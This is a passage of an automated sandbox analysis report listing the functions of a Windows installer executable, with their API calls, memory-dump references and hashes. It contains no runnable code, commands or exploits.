                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 334405425-0
                                                                      • Opcode ID: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                      • Instruction ID: 589db8f59639f89aa10495d7cc04380c60c8a7cdceb46225d1e949d191b74c22
                                                                      • Opcode Fuzzy Hash: 5475f02f106110a916f15ee9ab206587335882ec0c1efca6123a78a63609b3d2
                                                                      • Instruction Fuzzy Hash: 51218071D00205AACF20AFA5CE4999E7A70BF04358F74813BF511B51E0DBBD8991DB6A
                                                                      Function 00401B77 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BE7
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: Call
                                                                      • API String ID: 3394109436-1824292864
                                                                      • Opcode ID: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                      • Instruction ID: ae3691a386166457dd68fa0d34360560a99e353b90efe6619b1f582ab4c46bbf
                                                                      • Opcode Fuzzy Hash: 913a1641bf1678fd544d2f354cdad38cfe4f2c05cfad93494d599300ab092abb
                                                                      • Instruction Fuzzy Hash: 9B219973600100DBDB20EF94DD8595E77A4AB44318735053FF102F32D0DBB8A8909BAD
                                                                      Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 0040253E
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Enum$CloseValue
                                                                      • String ID:
                                                                      • API String ID: 397863658-0
                                                                      • Opcode ID: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                      • Instruction ID: aff41db5cb1f43c080787ec2daae132adce55f0eb50407644cc943dfdce05a74
                                                                      • Opcode Fuzzy Hash: 56344988bb6116f92104e687caff177940e4dcbfe6d483e74d802acf9f516b16
                                                                      • Instruction Fuzzy Hash: 59018471904204BFEB149F95DE88ABF7ABCEF80348F14803EF505B61D0DAB85E419B69
                                                                      Function 703D2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastRead
                                                                      • String ID:
                                                                      • API String ID: 1948546556-0
                                                                      • Opcode ID: 6f90f86cf6d8764fa677fdb047acb50334159939b2ee2bc5230630ebbca88e2b
                                                                      • Instruction ID: 3ceb14440f450e335970443c14443374c0bbf61e036525ab485a1b56a4d28c12
                                                                      • Opcode Fuzzy Hash: 6f90f86cf6d8764fa677fdb047acb50334159939b2ee2bc5230630ebbca88e2b
                                                                      • Instruction Fuzzy Hash: D2519F73804204DFEB25DFA1DD42F5D77B9EB64314F2144AAE90ACB320DA78A892CB51
                                                                      Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3356406503-0
                                                                      • Opcode ID: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                      • Instruction ID: 1ba22ac92ecf447665b3913d31df39b0814a7bcf15a964c104b9173a467dca89
                                                                      • Opcode Fuzzy Hash: 2817fdc1b453530556b1233eeb78b93eab19bad1ba8c502dca76499b0c80bb5e
                                                                      • Instruction Fuzzy Hash: 2A119431910205EBDB14DFA4CA585AE77B4FF44348F20843FE445B72C0D6B85A41EB5A
                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                      • Instruction ID: 2a828f8333626ea4f8ae47897e76cf54d119540c9549312051f7543085d76b41
                                                                      • Opcode Fuzzy Hash: 1be36e7ffb4e60f8615e9040eadbbc0b6b8dcead5e0d66e97d35916fbcf3aab6
                                                                      • Instruction Fuzzy Hash: 9101D132624210ABE7095B789D04B6A3698E751315F10C63BB851F66F1DA7C8C429B4D
                                                                      Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$EnableShow
                                                                      • String ID:
                                                                      • API String ID: 1136574915-0
                                                                      • Opcode ID: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                      • Instruction ID: ed958cdb0af940290ad8e224458c39a91d35accb7d2f19645d781aa9a2f92111
                                                                      • Opcode Fuzzy Hash: a5279d58909cb0200b7873d2906f67189e0a8c6f713d0d692494d0366452260b
                                                                      • Instruction Fuzzy Hash: ECE01A72E082008FE764ABA5AA495AD77B4EB91325B20847FE211F11D1DE7858418F6A
                                                                      Function 00406671 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                        • Part of subcall function 00406601: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                        • Part of subcall function 00406601: wsprintfW.USER32 ref: 00406653
                                                                        • Part of subcall function 00406601: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2547128583-0
                                                                      • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                      • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                      • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                      • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                      Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                      • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCreate
                                                                      • String ID:
                                                                      • API String ID: 415043291-0
                                                                      • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                      • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                      • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                      • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                      Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                      • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                      • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                      Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1375471231-0
                                                                      • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                      • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                      • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                      • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                      Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
